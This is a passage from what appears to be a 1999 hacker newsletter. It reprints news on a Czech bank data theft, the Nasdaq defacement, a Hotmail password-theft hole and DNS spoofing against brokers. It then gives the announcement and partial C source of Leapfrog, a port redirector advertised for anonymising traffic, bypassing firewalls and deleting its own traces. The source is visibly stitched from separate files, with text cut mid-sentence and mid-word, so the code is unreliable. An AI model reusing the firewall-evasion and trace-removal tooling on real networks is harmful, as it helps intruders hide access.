traffic to the site. "We've seen a 15 per cent to 20
per cent increase in visits from India since the
blockage was removed," Haroon said.
"Worldwide, we saw our readership increase by
some 20 per cent during the period of the Kargil
conflict. Our experience is that when you attract a
larger number of people than usual because of
some crisis, you tend to retain a substantial fraction
of them after the crisis."
He said Dawn greatly appreciated the united stand
taken by the mainstream Indian press in their
support. In particular the Times of India, the Indian
Express, Rediff.com and the Asian Age, which all
strongly opposed the ban.
"The Asian Age continued to print Dawn's material
as before using their London office to access our
site and download the material. Had our roles been
reversed, we would have taken an equally
supportive stand."
Additional reporting from India done by Vikram
Varma
@HWA
74.0 Czech Bank Threatened by Cyber Terrorists
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by mo0ne
The largest Czech savings bank, Ceska Sporitelna, may
have had large amounts of its data stolen. Local police
investigating the situation have not yet made any
arrests. Customer names, addresses and complete list of
transactions for more than 2.5 million clients are
supposedly no longer in the banks hands. It is unclear
from this article what the thief of this information
wants.
Internet News
http://www.internetnews.com/intl-news/print/0,1089,6_204701,00.html
International News
Unknown Hacker Offers Czech
Savings Bank Data via Net
September 21, 1999
Petr Koubsky, Czech Correspondent
International News Archives
[Prague, CZECH REPUBLIC] Czech police are investigating the case of a hacker
who is offering Internet access to the complete database of client transactions data
of the largest Czech savings bank Ceska sporitelna.
Although the manhunt began September 13, the police have yet to locate the
offender.
Certain Czech companies from various industries obtained the anonymous offer. Its
author claims to have vital data -- among others name, address and complete list of
transactions for any given period -- about the more than 2.5 million of clients of
Ceska sporitelna. Details from the accounts of several randomly selected clients
were enclosed as the evidence, and the sample information was confirmed by the
clients themselves.
The anonymous hacker also published his e-mail address, sporoziro@yahoo.com,
that he offers for communication with media as well as for "business offers."
Ceska sporitelna conceded that privacy of its clients is in serious threat, but denied
that deposits could by in any danger. However, the reputation of the bank was
damaged.
Some sources close to the police say that the attack might primarily be assigned to
hurt the bank and lower its market capitalization; Ceska sporitelna is currently in
the final phase of privatization.
Police also assumes the offender may be an insider at the bank. This theory is
backed by representatives of the IT companies that supplied Ceska sporitelna with
its database system, among them Microsoft and IBM.
Some in the Internet industry fear that the case might be used by politicians as
argument for enforcing the more restrictive Internet access laws. In the present,
Czech Internet laws are quite liberal, but are often vaguely stated.
Copyright 1999 internet.com Corp.
All Rights Reserved. Legal Notices, Reprints.
@HWA
75.0 'Post Mortem' of Nasdaq Released
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by no0ne
London-based mi2g software has claimed to have done
a 'post mortem' of the defacement of the NASDAQ web
site, perpetrated last week by the United Loan Gunmen.
mi2g is claiming that unpatched vulnerabilities in
Microsoft's Internet Information Server were exploited.
(And how do they know this? Are they sure it was IIS
and not NT? Did NASDAQ hire these people to analyze
the logs? Or are they just making stuff up?)
The UK Register
http://www.theregister.co.uk/990920-000012.html
mi2g Software
http://www.mi2g.co.uk/
UK Register;
Posted 20/09/99 12:38pm by Tim Richardson
Nasdaq hacked through MS security hole
Flaws in Microsoft's Internet Information Servers have been blamed for the hack attack
on the Nasdaq and American Stock Exchange Web site last week.
The weaknesses allowed hackers to breach security and trash one of the most high
profile Web sites in the US. The allegation was made by London-based mi2g
software which carried out a post mortem of the hack attack.
"Initial analysis suggests that well publicised vulnerabilities in Microsoft's Internet
Information Server have been exploited," said the report.
"Whilst Microsoft has been regularly issuing software patches for holes found, there is
no guarantee that all patches may have been applied by the network administrators,"
it said.
The attack -- which left graffiti all over the walls of the financial Web site -- was
allegedly carried out by the hacker group "United Loan Gunmen" (ULG).
The most sensitive aspect of the attack is a claim by the ULG that it set up an email
account on Nasdaq's computers.
If this proves to be true, it would mean that ULG obtained "deep access" to the
Nasdaq computer system severely compromising the security of the site.
"On-line financial institutions, bourses and shopping sites ought to be aware that they
need to put Internet security at the top of the board agenda," warned DK Matai, MD of
mi2g software.
Despite being contacted on Friday to discuss the matter, no one from Microsoft was
available for comment by press time. ®
@HWA
76.0 DoD Creates Y2K-Alert Levels In case of Sneak Attack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by Michelle
The Department of Defense has created various
Y2K-alert levels as part of its contingency plan to deal
with a potential sneak attack as a result of Y2K related
computer failures. The levels cover everything from
widespread systems failures to "opportunistic
engagements" by an opposing nation-state.
Yahoo News
http://dailynews.yahoo.com/h/nm/19990922/ts/yk_usa_2.html
Wednesday September 22 12:24 AM ET
Pentagon Planners Mull Y2K Sneak Attack
By Jim Wolf
WASHINGTON (Reuters) - The Year 2000 computer glitch could open the door to a sneak attack on the United States, especially if many
automated systems crash, the Defense Department said in a contingency-planning memo obtained Tuesday.
To deal with such a threat, the Pentagon is working out worldwide staffing and emergency procedures to cope with vulnerabilities that could be caused by computer
mix-ups, according to the memo from the Joint Chiefs of Staff dated Sept. 10.
The document, sent to U.S. commanders worldwide, spelled out five alert levels to streamline the Defense Department's response.
The highest, ``Y2K Posture Level One,'' would reply to ''widespread'' systems failures sparked by the century date change. It assumes that civilian authorities would
seek military help to cope with disruptions.
In such a case, ``deliberate information operations attacks and opportunistic engagements by hostile forces are possible,'' it said.
``Information operations attacks'' refers to computer-based efforts to knock out critical electronic infrastructure such as financial networks or military data banks.
``Opportunistic engagements'' means surprise attacks timed to cash in on any Y2K-related confusion in the United States, the world's most technologically
dependent nation.
Under such a Y2K-alert level, ``strict'' caps on communications throughout the Defense Department might be imposed, presumably for fear of playing into the hands
of a foe seeking to take advantage of Y2K-related disruptions, the document said.
The memo from the Joint Chiefs assigned the five unified regional war-fighting commands and military services the task of preparing troops, equipment and technical
support personnel for five graduated Y2K-related potential threat levels.
The military would adjust its year-end and early January operations on the basis of those Y2K ``vulnerability'' assessments, the document said. It said the alert level
would be declared, as normal, by Defense Secretary William Cohen.
If a threshold of perceived vulnerability is crossed because of systems failures, Cohen ``will declare a Y2K posture level and the department will respond by
adjusting readiness postures accordingly.''
``Recognizing the uniqueness of each Department of Defense organization, you should develop, promulgate and implement the corresponding Y2K readiness
postures that best prepare your organization to cope with most probable Y2K consequences,'' the memo told commanders, service chiefs and Pentagon agency
heads.
Such preparations were a normal part of military contingency planning not unlike the five levels of readiness for a hurricane, said a spokesman for the Joint Chiefs of
Staff, Navy Lt. Cmdr. Jim Brooks.
``Preparing for Y2K is much like we would do for any potential threat out there,'' he said.
Many military units have been conducting ``tabletop'' exercises to get ready for the Y2K glitch, which may scramble systems that have not been reprogrammed to
recognize the century date change in 101 days.
Such drills, partly to determine where to base equipment such as electric generators and emergency medical supplies, ''have already taken place and they are taking
place,'' Brooks said.
John Hamre, the deputy defense secretary in charge of Y2K at the Pentagon, is ``particularly interested in your assessment of the need to preposition'' personnel and
equipment to cope with any Y2K problems, the memo said.
@HWA
77.0 Another Java Hole in Hotmail
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by Code Kid
Another Java related hole in Hotmail allows a malicious
user to steal Hotmail passwords.
C|Net
http://news.cnet.com/news/0-1005-200-122099.html
Hotmail bug allows password theft
By Erich Luening
Staff Writer, CNET News.com
September 22, 1999, 12:45 p.m. PT
Microsoft can't seem to shake the security gremlins from its Hotmail free email service.
The software giant is investigating yet another security dilemma with its Hotmail service that permits the sending of JavaScript
code that could automatically present a bogus password entry screen. Usernames and passwords entered by unsuspecting
users could be collected by the email sender.
Microsoft said it is looking into the issue, although it has not received any other reports on this security problem.
JavaScript is a Web scripting language developed by Netscape Communications for performing actions on Web pages without
user input. The language is commonly used for launching pop-up windows or for scrolling text, but
it has also become a major security headache for browser makers and Web sites like Hotmail
because of its potential usefulness to malicious hackers.
Earlier this month, Microsoft confirmed a JavaScript password-stealing exploit that had the same
effect as the most recent one, but that was implemented differently, according to Georgi Guninski,
a Bulgarian programmer.
Guninski claims the new JavaScript glitch circumvents Hotmail security barriers by placing the
JavaScript in HTML image files.
Microsoft confirmed that the glitch is yet another way to execute malicious code in someone's email.
"We do filter out some JavaScript tags to provide better security, to stop some hacks and spoofs,"
said MSN lead product manager Deanna Sanford. "As we get these reports, we are evaluating
other filters to provide to users. It's an ongoing process."
As an extreme measure to protect against such security breaches, both Guninski and Sanford said users can disable JavaScript
in their browsers.
After a security problem last week exposed Hotmail users to attack, Microsoft acknowledged it was hiring an outside firm to
examine security at the free email service.
@HWA
78.0 Microsoft Launches New Piracy Initiative
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by Pir8
Microsoft is going after online pirates in a big way. The
company has recently filed legal action against three
US-based electronic businesses. The companies
operated only through SPAM and delivered pirated
copies of Microsoft products to consumers.
Wired
http://www.wired.com/news/news/business/story/21885.html
Microsoft Gunning for E-Pirates
Wired News Report
12:45 p.m. 22.Sep.99.PDT
Microsoft is putting the full-court press on Net sites selling counterfeit copies of its software.
The company filed legal action against three US-based businesses, citing the electronic stores for consumer deception and distribution of
counterfeit software. The culprit: the oh-so-easy Internet.
"The Internet as a powerful tool of e-commerce is also being used by counterfeiters as an effective mechanism for targeting consumers," said
Microsoft corporate attorney Tim Cranton.
There's nothing new about a crackdown on software piracy, but Microsoft said this piracy operation was unique in the way that it exploited the
Web and email for its purposes.
According to Microsoft, a network of counterfeiters, working independently from home, combined to wreak unprecedented havoc.
"The difference really is the spamming," Cranton said. "What we have is counterfeit distribution that is being effected through unsolicited email
being sent to consumers around the world."
Email was the only source for orders taken by the pirates, Cranton said, adding that this is a new tactic in the area of piracy.
"The consumer doesn't need to leave their house to go to a business," he said. "It just comes right into your living room."
The defendants named in the suit took orders and arranged shipment from their homes without maintaining any inventory, Microsoft said. The Net
also protected their anonymity; the defendants conducted fairly elaborate schemes to hide the origins of their email.
Millions of consumers were targeted by the messages, amd thousands bought software in only a few months. In less than six months, a Microsoft
piracy hotline received more than 2,000 calls from victimized or suspicious consumers.
The callers typically ordered the software only to discover that either it didn't work or the package was incomplete. The spam targeted individuals,
companies, law firms, and government agencies around the world, Microsoft said.
Microsoft hired professional investigators who made their way to the pirates by tracking down the source of the email.
The case is indicative of a larger trend, Cranton said.
"We're seeing a huge increase in the prevalence of counterfeit software over the Internet ... whether through Web sites or auction sites, or
through downloading sites."
Counterfeit software is very professionally packaged and sold in places where they least expect it, and consumers need to be careful, Microsoft
cautioned.
The effort to stem counterfeit sales came one day after the United States said it might appeal a World Trade Organization finding that a US export
tax structure is protectionist and violates international agreements.
The European Union argued that the US plan amounted to an export subsidy for American firms, with Boeing and Microsoft among the chief
beneficiaries.
"This US export subsidy has created an important distortion of international trade by granting an unfair advantage to US products in third markets,"
said Pascal Lamy, the EU's trade chief. "[It] has expanded over the last decade to more sectors, including computer software and agricultural
products."
A spokesman for the US mission to the EU in Brussels had no comment. The United States maintains that its tax structure is consistent with WTO
rules.
@HWA
79.0 Online Investors at Serious Risk
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by st0len
A demonstration at the Smart Card Forum's annual
conference Digital Bond revealed how online investors
are at serious risks from simple attacks. The methods
demonstrated invo
lved spoofing DNS entries to fool
people into entering their username/passwords on fake
sites.
Digital Bond
http://www.digitalbond.com/
Yahoo News
http://biz.yahoo.com/bw/990922/fl_digital_1.html
Wednesday September 22, 7:45 am Eastern Time
Company Press Release
Digital Bond Demonstrates Online Investors at Risk From Simple Criminal
Attack
Digibond(TM) Security Protects the Integrity of Internet Transactions
WASHINGTON--(BUSINESS WIRE)--Sept. 22, 1999-- Digital Bond(TM) revealed today how virtually every investor that
trades over the Internet is at risk from a simple hacker attack. A live demonstration at the Smart Card Forum's annual conference
showed how criminals could gather UserID / Password pairs to have access to investors' accounts. A criminal would use the
investors' money to manipulate a stock price and would make money in the criminal's legitimate account.
The attack involves a simple change in a Domain Name Service (DNS) file. DNS systems are distributed throughout the Internet, so a hacker would only need to
exploit a single ISP or corporate system. Any investors that use this DNS would be sent to hacker sites that looked identical to brokerage sites. After the hacker
collected the UserID / Password pair they would send the investor to the real brokerage site, and the investor would not know they had been compromised.
Additional technical information is available at www.digitalbond.com.
This attack highlights the need for a transaction based security protocol to replace the current session based encryption protocol (SSL). Transaction based security
provides:
-- Identity authentication of investor and brokerages
-- Transaction authentication for every order and receipt
-- Non-repudiation for every order and receipt
-- Unambiguous and secure dispute resolution procedures
The SSL encryption protocol used today by virtually every brokerage provides no transaction security. Plans to add investor and broker certificates in the future may
help provide identity authentication, but will not offer any transaction authentication, non-repudiation, or dispute resolution assistance.
Dale Peterson, President of Digital Bond, said: ``Virtually every other transaction, whether it be credit cards at a restaurant, ATM withdrawals, or wire transfers, has
strong transaction security. Surely the money involved in trading stocks over the Internet requires this same level of security. Our new Digibond secure transaction
system digitally signs every order and every receipt. Both the investor and brokerage can be assured of the integrity of every transaction message.''
For even greater security the investor system is available with a Certicom SC-400 elliptic curve smart card. The smart card, which is a credit card with an embedded
digital signature chip, digitally signs all orders and is used to verify all receipts. It is as easy to use as an ATM card. The investor inserts the smart card in a reader,
and a window to enter their password pops up on the screen. Without both the smart card and password, the investor can not trade on their account. The rest of the
process is automated and requires no additional steps than those needed to trade online today.
The Digibond systems solves a major problem for investors: dispute resolution. Today it is difficult for an investor to prove their claim in a dispute. With the Digibond
system, a digitally signed receipt from the brokerage is irrefutable proof of the transaction. In fact, the Digibond investor system has a dispute button the investor can
click on to send the signed receipt to the brokerage for automated dispute resolution.
Brokerages and other merchants can easily integrate the Digibond system into their network. Existing web server applications simply use Digibond functions for
signing, verifying signatures, and dispute resolution. Most importantly the Digibond system architecture was created to handle the most optimistic estimates for
transaction volume for the next five years. It is a scalable, high performance system.
The Digibond system will secure any two-party transaction. Mr. Peterson said, ``We are initially focused on the Internet brokerage industry, but this solution can
secure Internet prescription services, Internet credit cards, Internet casinos, and other Internet transaction businesses.'' Pilot projects will be announced in October
and initial deployment will start at the beginning of the year 2000, after the Y2K lockdowns are over.
About Digital Bond
Digital Bond was founded by a team of security experts with decades of experience protecting financial transactions. Digital Bond develops leading systems and
services that protect the integrity of Internet transactions. For more information, visit Digital Bond's web site at http://www.digitalbond.com .
About Certicom
Certicom is a leading provider of next-generation encryption technology used to build strong, fast, and efficient security solutions. Major computing and
communications companies, such as 3Com/Palm Computing, BellSouth Wireless Data, Hewlett-Packard, Motorola, Pitney Bowes and VeriFone, incorporate
Certicom's technology into electronic commerce software, wireless messaging applications, and smart cards. Certicom shares are traded on the Toronto Stock
Exchange under the symbol ``CIC.''
For More Information Contact: Digital Bond, Inc. Attn: Dale Peterson 6289 W. Sunrise Blvd., Suite 204 Sunrise, FL 33313 Tel: 954-797-9445 FAX:
954-797-9447 peterson@digitalbond.com www.digitalbond.com
Contact:
Digital Bond, Inc., Sunrise, Fla.
Dale Peterson, 954/797-9445
-=-
@HWA
80.0 Leapfrog 1.0 Released Today
~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by forensic
COTSE today released Leapfrog 1.0, a utility which
anonymizes and redirects any port. It can be used to
work around firewall configuration and other issues
requiring a port redirect. Leapfrog will take any incoming
connections and automatically send them to any other
machine, any other port.
COTSE
http://www.cotse.com/leapfrog.htm
Leapfrog 1.0
Leapfrog will anonymize and redirect any port. It can be used to
work around firewall configuration and other issues requiring a port
redirect.
For example, you have a firewall that does not allow telnet (23), but
it does allow http (80). Set leapfrog up on the other side of the
firewall to listen on port 80 and send to 23, then telnet to port 80 of
the leapfrog machine and you will ricochet to the machine you wish
to connect. You will have the Leapfrog machines' IP and MAC
addresses. It supports unlimited users (well, limited by memory).
Leapfrog can be chained, reconfigured on the fly, and customized to
change ports/machine redirects without the need to log into the box.
It can be configured (with little work) to remove all traces of itself
from disk after being loaded, or it can be configured to log everything
(default). It supports colors and some basic admin tools. It is very
fast.
Leapfrog compiles on Solaris 2.6, 2.7, x86 (2.6, 2.7), Linux with
pthread libs, BSD with pthread libs. Possibly others, but it wasn't
tested on others.
1.0a has been released. This corrects some spelling and format
mistakes as well as corrects a few ifdef's. It also adds the gnu
public license.
leapfrog-1.0/ to caller
Pre compare is address of compare function used
whenever two nodes need to be compared.
Post head has allocated or error returned
Return head node pointer or null if memory overflow
*/
LIST *createList
(int (*compare) (void *argu1, void *argu2))
{
/* Local Declarations */
LIST *list;
/* Statements */
list = (LIST *) malloc (sizeof (LIST));
if (list)
{
list->head = NULL;
list->pos = NULL;
list->rear = NULL;
list->count = 0;
list->compare = compare;
} /* if */
return list;
} /* createList */
/* =============== addNode ============== */
/* Inserts data into linked list.
Pre pList is a pointer to a valid list
dataInPtr is a pointer to data to be inserted
Post data inserted unless dupe key or overflow
Return -1 if overflow, 0 if successful, 1 if dupe key
*/
int addNode (LIST *pList,
void *dataInPtr)
{
/* Local Declarations */
int found;
int success;
NODE *pPre;
NODE *pLoc;
/* Statements */
found = _search (pList, &pPre, &pLoc, dataInPtr);
// if (found == 1)
/* Duplicate keys not allowed */
// return (+1);
success = _insert (pList, pPre, dataInPtr);
if (!success)
/* Overflow */
return (-1);
return (0);
} /* addNode */
/* =============== _insert ============== */
/* Inserts data pointer into a new node in the linked list.
Pre pList is a pointer to a valid list
pPre is a pointer to the data's predecessor
dataInPtr contains data pointer to be inserted
Post data have been inserted in sequence
Return boolean, true if successful,
false if memory overflow.
*/
static int _insert (LIST *pList,
NODE *pPre,
void *dataInPtr)
{
/* Local Declarations */
NODE *pNew;
/* Statements */
if (!(pNew = (NODE *) malloc(sizeof(NODE))))
return 0;
pNew->dataPtr = dataInPtr;
pNew->link = NULL;
if (pPre == NULL)
{
/* Adding before first node or to empty list. */
pNew->link = pList->head;
pList->head = pNew;
if (pList->count == 0)
/* Adding to empty list. Set rear */
pList->rear = pNew;
} /* if pPre */
else
{
/* Adding in middle or at end */
pNew->link = pPre->link;
pPre->link = pNew;
/* Now check for add at end of list */
if (pNew->link == NULL)
pList->rear = pNew;
} /* if else */
(pList->count)++;
return 1;
} /* _insert */
/* =============== removeNode ============== */
/* Removes data from linked list.
Pre pList is a pointer to a valid list
keyPtr is pointer to key to be deleted
dataOutPtr is a pointer to data pointer
Post Node deleted or error returned.
Return false (0) if not found; true (1) if deleted
*/
int removeNode (LIST *pList,
void *keyPtr,
void **dataOutPtr)
{
/* Local Declarations */
int found;
NODE *pPre;
NODE *pLoc;
/* Statements */
found = _search (pList, &pPre, &pLoc, keyPtr);
if (found)
_delete (pList, pPre, pLoc, dataOutPtr);
return found;
} /* removeNode */
/* =============== _delete ============== */
/* Deletes data from a linked list and returns
pointer to data to calling module.
Pre pList is a pointer to a valid list.
pPre is a pointer to predecessor node
pLoc is a pointer to target node
dataOutPtr is pointer to data pointer
Post Data have been deleted and returned
Data memory has been freed
*/
void _delete (LIST *pList,
NODE *pPre,
NODE *pLoc,
void **dataOutPtr)
{
/* Statements */
*dataOutPtr = pLoc->dataPtr;
if (pPre == NULL)
/* Deleting first node */
pList->head = pLoc->link;
else
/* Deleting any other node */
pPre->link = pLoc->link;
/* Test for deleting last node */
if (pLoc->link == NULL)
pList->rear = pPre;
(pList->count)--;
free (pLoc);
return;
} /* _delete */
/* =============== searchList ============== */
/* Interface to search function.
Pre pList is a pointer to an initialized list.
pArgu is pointer to key being sought
Post pDataOut contains pointer to found data
-or- NULL if not found
Return boolean true if successful, false if not found.
*/
int searchList (LIST *pList,
void *pArgu,
void **pDataOut)
{
/* Local Declarations */
int found;
NODE *pPre;
NODE *pLoc;
/* Statements */
found = _search (pList, &pPre, &pLoc, pArgu);
if (found)
*pDataOut = pLoc->dataPtr;
else
*pDataOut = NULL;
return found;
} /* searchList */
/* =============== _search ============== */
/* Searches list and passes back address of node containing
target and its logical predecessor.
Pre pList is a pointer to an initialized list.
pPre is pointer variable to receive predecessor
pLoc is pointer variable to receive node
pArgu is pointer to key being sought
Post pLoc points to first node equal/greater key
-or- null if target > key of last node
pPre points to largest node smaller than key
-or- null if target < key of first node
Return boolean true if successful, false if not found.
*/
int _search (LIST *pList,
NODE **pPre,
NODE **pLoc,
void *pArgu)
{
/* Macro Definition */
#define COMPARE (((* pList->compare) (pArgu, (*pLoc)->dataPtr)))
#define COMPARE_LAST ((* pList->compare) (pArgu, pList->rear->dataPtr))
/* Local Declarations */
int result;
/* Statements */
*pPre = NULL;
*pLoc = pList->head;
if (pList->count == 0)
return 0;
/* Test for argument > last node in list */
if ( COMPARE_LAST > 0)
{
*pPre = pList->rear;
*pLoc = NULL;
return 0;
} /* if */
while ( (result = COMPARE) > 0 )
{
/* Have not found search argument location */
*pPre = *pLoc;
*pLoc = (*pLoc)->link;
} /* while */
if (result == 0)
/* argument found--success */
return 1;
else
return 0;
} /* _search */
/* =============== retrieveNode ============== */
/* This algorithm retrieves data in the list without
changing the list contents.
Pre pList is a pointer to an initialized list.
pArgu is a pointer to key of data to be retrieved
Post Data (pointer) passed back to caller
Return boolean true if successful,
false if underflow.
*/
static int retrieveNode (LIST *pList,
void *pArgu,
void **dataOutPtr)
{
/* Local Declarations */
int found;
NODE *pPre;
NODE *pLoc;
/* Statements */
found = _search (pList, &pPre, &pLoc, pArgu);
if (found)
{
*dataOutPtr = pLoc->dataPtr;
return 1;
} /* if */
*dataOutPtr = NULL;
return 0;
} /* retrieveNode */
/* =============== emptyList ============== */
/* Returns boolean indicating whether or not the
list is empty
Pre pList is a pointer to a valid list
Return boolean true if empty, false if list has data
*/
int emptyList (LIST *pList)
{
/* Statements */
return (pList->count == 0);
} /* emptyList */
/* =============== fullList ============== */
/* Returns boolean indicating no room for more data. The list
is full if memory cannot be allocated for another node.
Pre pList is a pointer to a valid list
Return boolean true if full,
false if room for another node.
*/
int fullList (LIST *pList)
{
/* Local Declarations */
NODE *temp;
/* Statements */
if ((temp = (NODE *)malloc (sizeof (NODE))))
{
free (temp);
return 0;
}
/* Dynamic memory full */
return 1;
} /* fullList */
/* =============== listCount =============== */
/* Returns integer representing number of nodes in list.
Pre pList is a pointer to a valid list
Return count for number of nodes in list
*/
int listCount(LIST *pList)
{
/* Statements */
return pList->count;
} /* listCount */
/* =============== traverse ============== */
/* Traverses a linked list. Each call either starts at
the beginning of list or returns the location of the
element in the list that was last returned.
Pre pList is a pointer to a valid list
fromWhere is 0 to start at the first element
dataPtrOut is address of a pointer to data
Post if another element, address placed in dataPtr
Return true if another element located,
false if end of list
*/
int traverse (LIST *pList,
int fromWhere,
void **dataPtrOut)
{
/* Local Declarations */
int success;
/* Statements */
if (fromWhere == 0)
{
/*Start from first node */
if (pList->count == 0)
success = 0;
else
{
pList->pos = pList->head;
*dataPtrOut = pList->pos->dataPtr;
success = 1;
} /* if else */
} /* if fromwhere */
else
{
/* Start from current position */
if (pList->pos->link == NULL)
success = 0;
else
{
pList->pos = pList->pos->link;
*dataPtrOut = pList->pos->dataPtr;
success = 1;
} /* if else */
} /* if fromwhere else */
return success;
} /* traverse */
/* =============== destroyList ============== */
/* Deletes all data in list and recycles memory
Pre List is a pointer to a valid list.
Post All data and head structure have been deleted.
Return null head pointer
*/
LIST *destroyList (LIST *pList)
{
/* Local Declarations */
NODE *deletePtr;
/* Statements */
if (pList)
{
while (pList->count > 0)
{
/* First delete data */
free (pList->head->dataPtr);
/* Now delete node */
deletePtr = pList->head;
pList->head = pList->head->link;
pList->count--;
free (deletePtr);
}
free (pList);
} /* if */
return NULL;
} /* destroyList */
lso if you want to make a little more fucntionality, that is if you want to have functions in which the
users can access while connected follow the command strcut and add the functions as done with the command_func
from link.h f()() is all, Follow the all[] array and the foramt i have created,
nothing tricky here. You can use the input( arg ) function (takes a struct frog *).
Just follow the examples I have created in the port+1 section of the code. Get input gets keyed/data input
and returns 1 on good input and -1 if the user has not hit a key within 30seconds (timeout).
Linked_list taken from: Brooks/Cole Publishing Company, see linked_list.h for disclaimer
To change port to bind to edit include/config.h for user configs and then run make again
NOTES:
if you are going through a firewall connections may need to go through opened firewall ports
WISH LIST:
Next version I will clean up the code, and allow the user to drop to a shell localy
Also I will create a nice admin interface on the port+1 to do local things...
Web Site:
www.cotse.com
*/
/* server */
/* #define _REENTRANT */
#include "include/config.h"
#include <signal.h>
#include <stdio.h>
#include <stdarg.h>
#include <sys/types.h>
#include <errno.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <malloc.h>
#include <ctype.h>
#include <sys/ioctl.h>
#include <arpa/inet.h>
#include <fcntl.h>
#include <netdb.h>
#include <stdlib.h>
#include <string.h>
#include <sys/time.h>
#include <arpa/telnet.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/un.h>
#include <sys/socket.h>
#include <sys/un.h>
#ifdef SOLARIS
#include <sys/filio.h>
#endif
#include <netinet/in.h>
#include "include/link.h"
#include "include/linked_list.h"
#include "include/proto.h"
#include "include/version.h"
// the old redhat4 defs go back to previos redhat implentations before pthreads came standard
#ifdef REDHAT4
#include </usr/include/pthread/mit/pthread.h>
#endif
#ifdef REDHAT5
#include <pthread.h>
#endif
#define IPROTO 0
#ifdef SOLARIS
extern int close (int);
extern int socket (int, int, int);
#if !defined(LINUX)
//extern int getsockopt (int, int, int, char *, int *);
extern void bzero (char *, int);
#endif /* LINUX */
extern int listen (int, int);
#endif /* SOLARIS */
/* Local Function Prototypes */
char *first_char(char *line);
void init_socket(int port);
void who(struct frog *p, char *str);
void send_fd(struct frog *p, char *str);
void cls(struct frog *p, char *str);
void close_socket(struct frog *current);
void get_input(struct frog *current);
void show_login(struct frog *p);
void password_mode_on(struct frog *p);
void password_mode_off(struct frog *p);
void do_prompt(struct frog *p);
void hitells(struct frog *p, char *str);
void shut_down(struct frog *p, char *str);
void time_logged_in(struct frog *p, int x);
void init_signals();
void log_file(char *file, char *string, ...);
void alive_connect(void);
char *sys_time(void);
int input(struct frog *p);
struct terminal terms[] = {
{"xterm", "\033[1m", "\033[m", "\033[H\033[2J"},
{"vt220", "\033[1m", "\033[m", "\033[H\033[J"},
{"vt100", "\033[1m", "\033[m", "50\033[;H\0332J"},
{"vt102", "\033[1m", "\033[m", "50\033["},
{"ansi", "\033[1m", "\033[0m", "50\033[;H\0332J"},
{"wyse-30", "\033G4", "\033G0", ""},
{"tvi912", "\033l", "\033m", "\032"},
{"sun", "\033[1m", "\033[m", "\014"},
{"adm", "\033)", "\033(", "1\032"},
{"hp2392", "\033&dB", "\033&d@", "\033H\033J"},
{"java","","",""},
{0, "", "", ""}
};
// struct to hold any function calls made by connected, will work for admin tools
struct command all[] =
{
{"cls",cls,0,0,0,0},
{"help",view_commands,0,0,0,0},
{"time",time_up,0,0,0,0},
{0, 0, 0, 0, 0, 0, 0}
};
/* Local/global Variables */
int RAMUSED;
int mainsock;
pid_t pid;
FILE *wt;
int in_current=0;
int in_pack_current=0;
int out_current=0;
int out_pack_current=0;
int logins;
int current_online;
int alive_descriptor;
// mutexs not used in this program, can be used though
pthread_mutex_t linked_list = PTHREAD_MUTEX_INITIALIZER;
void* serverWatch( void* );
void* serverClient( struct player_t *p_t);
void* configWatch( void* );
void* configClient( struct player_t *p_t);
// port to def listen on
int main_descriptor;
// port to def+1 listen on config thread
int config_descriptor;
// time value
time_t timeval;
int main ( void )
{
pthread_t watcher_thr,watcher_thr2;
RAMUSED=0;
log_file("server","Trying to connect to port....\n");
if (VERBOSE)
printf("trying to connect to port..\n");
// init the socket for use on SERVERPORT
init_socket(SERVERPORT);
// create thread for def port
pthread_create(&watcher_thr,NULL,serverWatch,(void*)NULL);
// create thread for def+1 port config thread we pass null b/c we have nothing to pass
pthread_create(&watcher_thr2,NULL,configWatch,(void*)NULL);
/* random number generation */
srand((unsigned int)getpid());
// Start our signal Handlers
init_signals();
for (;;)
{
// we will sleep here for 30 minutes then will sync all files at that time
// that is 1800 seconds == 30 mins
sleep(1800);
if (1)
{
// do whatever in here I write out to a log for sanity every 30mins
log_file("sync.fil","Sanity\n");
}
else
{
// ditto
log_file("sync.fil","Ratts No Sanity?\n");
}
}
exit(0);
}
/* log files */
void log_file(char *file, char *string, ...)
{
va_list argnum;
char stack[255],data[255];
int fd, length;
// they dont/do want logging
#if !defined(LOGGING)
return;
#endif
va_start(argnum, string);
vsprintf(data,string,argnum);
va_end(argnum);
sprintf(stack, "%slogs/%s.log", ROOT, file);
fd = open(stack, O_CREAT | O_WRONLY | O_SYNC, S_IRUSR | S_IWUSR);
length = lseek(fd, 0, SEEK_END);
write(fd, data, strlen(data));
close(fd);
}
/* not areal lot done here just old style signal handler */
void sig_exit(int crap)
{
char buf[255];
if (VERBOSE)
printf("Signal Caught sig_exit. Exiting Cleanly.\n");
sprintf(buf,"Signal %d caught sig_exit exiting cleanly?\n",crap);
log_file("signals",buf);
}
void sig_segv(int crap)
{
char buf[255];
if (VERBOSE)
printf("Segmentation Violation Caught. Exiting Cleanly\n");
sprintf(buf,"Signal %d caught exiting cleanly? Seg Violation\n",crap);
log_file("signals",buf);
// lets try to sync all the files now....
pthread_mutex_unlock(&linked_list);
exit(crap);
}
void sig_kill(int crap)
{
char buf[255];
if (VERBOSE)
printf("Signal %d caught, Kill caught, exiting cleanly?\n",crap);
sprintf(buf,"Signal %d caught, Kill caught, exiting cleanly?\n",crap);
log_file("signals",buf);
exit(crap);
return;
}
void sig_usr(int crap)
{
char buf[255];
if (VERBOSE)
printf("Signal %d caught, sig usr 1 or 2 or neither, exiting cleanly?\n",crap);
if ((crap==SIGUSR1))
sprintf(buf,"Signal %d caught, sig usr2, exiting cleanly?\n",crap);
else
if ((crap==SIGUSR2))
sprintf(buf,"Signal %d caught, sig usr2, exiting cleanly?\n",crap);
else
sprintf(buf,"Signal %d caught, in sig usr neither 1 or 2, exiting cleanly?\n",crap);
log_file("signals",buf);
exit(crap);
return;
}
void sig_pipe(int crap)
{
if (VERBOSE)
